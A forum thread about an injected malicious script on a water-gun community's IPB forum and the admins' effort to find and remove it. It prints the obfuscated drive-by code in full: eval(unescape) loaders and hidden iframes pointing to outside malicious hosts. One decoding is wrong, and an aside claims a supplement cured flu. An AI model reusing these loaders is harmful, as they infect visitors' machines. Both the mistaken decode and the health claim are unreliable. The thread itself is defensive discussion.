iSoaker.net :: Soaking the world!

Be wary when visiting the WaterWarfare.com forums currently. There seems to be some odd script that's been inserted into the forums and I'm really not sure what it's doing exactly, but it is trying to access sites with .cn and .ru addresses. I noticed an odd URL attempting to load when browsing WWc's main forum page, opened up AdAware, and noticed a bunch of odd addresses there.

Anyone know what this does apart from autoloading Google.com with potentially some invisible frames still running?

Code: Select all

<META http-equiv=Refresh content='0; URL=http://google.com'><div style='display:none'><a href='http://xaknet.ru'>âçëîì</a> <a href='http://forum.xaknet.ru'>âçëîìàòü</a></div><script type='text/javascript'>
<!--
var msg=314,d=document;
eval(unescape ('%20%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%32%33%38%39%62%61%36%32%37%65%61%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%72%61%6d%6f%6e%65%79%6d%61%79%6b%65%72%2e%63%6e%2f%61%6c%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%35%31%32%36%30%29%2b%27%66%31%62%62%5c%27%20%77%69%64%74%68%3d%32%33%33%20%68%65%69%67%68%74%3d%32%32%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%3e%27%29') );
//-->
</script>
<iframe src='http://lskdfjlerjvm.com/arm2/index.php' width='1' height='1' style='visibility: hidden;'></iframe><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%31%63%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6c%73%6b%64%66%6a%6c%65%72%6a%76%6d%2e%63%6f%6d%2f%61%72%6d%32%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%39%37%32%30%29%2b%27%33%65%35%5c%27%20%77%69%64%74%68%3d%31%36%32%20%68%65%69%67%68%74%3d%36%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

This is from the following URL that has been injected into WWc:

Code: Select all

http://tatiana-restaurant.com/photogallery14602/index.php

I do not recommend visiting that site unless you know what you might be getting yourself into. In fact, if you have an AdBlocking program, I'd recommend adding that site to it.

First string of code converts to:

Code: Select all

window.status='Done'; d.write('<IFRAME name=2389ba627ea src=\'http://ramoneymayker.cn/all.php?'+Math.round(Math.random()*51260)+'f1bb\' width=233 height=220 style=\'display: none\'></IFRAME>')

Second string converts to:

Code: Select all

window.status='Done'; d.write('<IFRAME name=2389ba627ea src=\'http://ramoneymayker.cn/all.php?'+Math.round(Math.random()*51260)+'f1bb\' width=233 height=220 style=\'display: none\'></IFRAME>')

Weird stuff...

Ouch. I did a bit of research and the only relevant information I found was that zaknet.ru was registered on August 4, 2007. So we have a rough timeframe for the hack.

Oh, and the WWc IPB is well out of date.

A WWc administrator should probably remove the code from the template(s) and update the IPB, if possible. Thanks for the heads-up, iSoaker.

I fixed the last hack so I thought this one would be easy to spot. I can't find it though. I honestly have no idea how they did this one.

I'll keep investigating, but it might be server side, and in that case I can't help.

Edit: DX, email me a copy of the site's access logs ASAP. I could figure out what happened a lot faster with that.

Edit again: I can't figure out what this hacker did this time. Changing the skin does nothing to remove the iframe. The iframe isn't in the board wrapper. It seems to me that the iframe is in the PHP itself. Check it out, DX.

Sorry, I've been away all day at a track meet in Boston. Which php files do you think contain the code? I can strip them out ASAP.

Edit: There a billion files and I can't seem to find the index that has html. The php index page is straight php. Maybe tomorrow, it's 3:30 AM here.

BTW Ben, I saw a guy with a UMD sweatshirt at the meet and got excited, thought we'd have a chance meeting on the track. Unfortunately, UMD wasn't there. I did, however, have a chance meeting on the track with an old friend from Duxbury that I had not seen in 11 years!

Not sure how IPB boards are coded, but if the index.php appears to be pure php and intact, I'd then assume it's in one of the includes. The code is inserted at the very bottom of the loaded source code when one browses to the forum's index page as well as any other page in the forums. Perhaps check some of the board's footer templates?

As an aside on hopefully happier thoughts, how was the track meet?

I checked every template it could be in. I even switched skins. It's not in the template/skin system. I'm rather sure it's somehow hardcoded into the board.

Why don't you try searching for snippets of the script that iSoaker.com posted? As long as the search goes through the text of the files, you might turn up something. Of course, the entire script may not be in any text file since they probably parsed some PHP to evade detection.

This could be a tough bug to find. The access logs are probably the best bet.

I should note that the code that's actually on WWc is:

Code: Select all

<iframe src='http://tatiana-restaurant.com/photogallery/gallery14602/index.php' width='1' height='1' style='visibility:hidden'></iframe>


The code I posted earlier is what is on the page being linked to.

You can see it if you do a View Source on any of the forum pages right at the bottom.

Still no luck at removing the code?

As I said, I can not find it in the skin/template system at all. I checked every template that it could be in. I searched for several different things. No luck. I'm rather sure it's somehow hardcoded into the board despite how unlikely that may seem, and I don't have FTP access, so I can't fix that.

...in which case the crackers must have gotten FTP access. That's rather scary since you'd expect it to be easier to find a hole in the software instead. Plus they could have done much more.

Could we ask Invision Power Service? They ought to provide at least marginal support for licensees.

I can't check if there's been a breach in the FTP - Conn Coll has a ban. The only thing I can do is change all the FTP passwords. @Ben: I can't get at my own access logs, they don't show up via web-based FTP, which is the only type I can use on the college server. It shouldn't make a difference though, so heck knows where the logs went.

I still can't find the code. Granted, I haven't had more than 15 minutes total to look, but it's not exactly obvious as to which include contains it.

I hate my life right now, it's too hectic. Have an exam and a paper coming up, got to read a whole play by tomorrow morning, and just got over the flu. Actually, it was really cool, the company my dad works for came out with a new 100% natural supplement called Blockade that can stop certain viruses on the spot. The first dose wiped out my fevor in half an hour, the 2nd does wiped out my flu altogether. I'm taking one more tonight to make sure I got all the virus cells. So that's why I haven't been online much for the past few days.

I don't know if I can find time to really get down to business on this hacking job until Friday. If not Friday, it goes till Sunday.

I thought UMD blocking .torrent files and doing packet shaping was bad. That's pretty annoying. FTP is at least 99% legitimate, so I see no reason to block it.

If you could change the password and PM it to me I'll take a look. Of course, you might have WWC set up so that you have to go through SM to change anything, so you might not want to do that. I'd rename index.php in the time being and then upload an index.html file explaining what's going on.

I think WWc has its own FTP so you don't have to go through SM. Perhaps the hackers broke that somehow? Just speculation.

I'll PM you the new password "later", later being hopefully sometime between 1 AM and 4 AM if you're awake...either that or Friday, I have almost all of Friday wide open.

I'll probably be in bed then because I have morning classes, so I'll just wait until later Friday and check it out. Thanks.

I was wondering why there was a bunch of spaces after the HTML code when examining the source... turns out that yes the skin was changed, but in a way that would make it hard to notice. The spaces made the edit appear below the text box. Why this didn't turn up in a search is beyond me. The problem is fixed.

This guy seems strangely appropriate at the moment.

Good job at finding and rectifying the problem at WWc, Ben!

Any idea on how they managed to edit the skin? I presume one needs an administrative password to access those files.

Thanks for the fix, Ben. Unless the inserted text was jumbled up (and unjumbled using JavaScript), I don't see how it didn't turn up in a search either.

I'm not sure whether they hacked the server or the forums. Duxburian, if SSH/FTP is shared among all your sites (you weren't sure earlier), you should make sure the others are fine too.

There's no way to know how the attack was executed without the logs. I would guess SQL injection because that happened before at WWC. Luckily phpBB3 and vBulletin have kept up with security issues, so at least that can't happen here or at SSC. I would upgrade IPB for security, DX.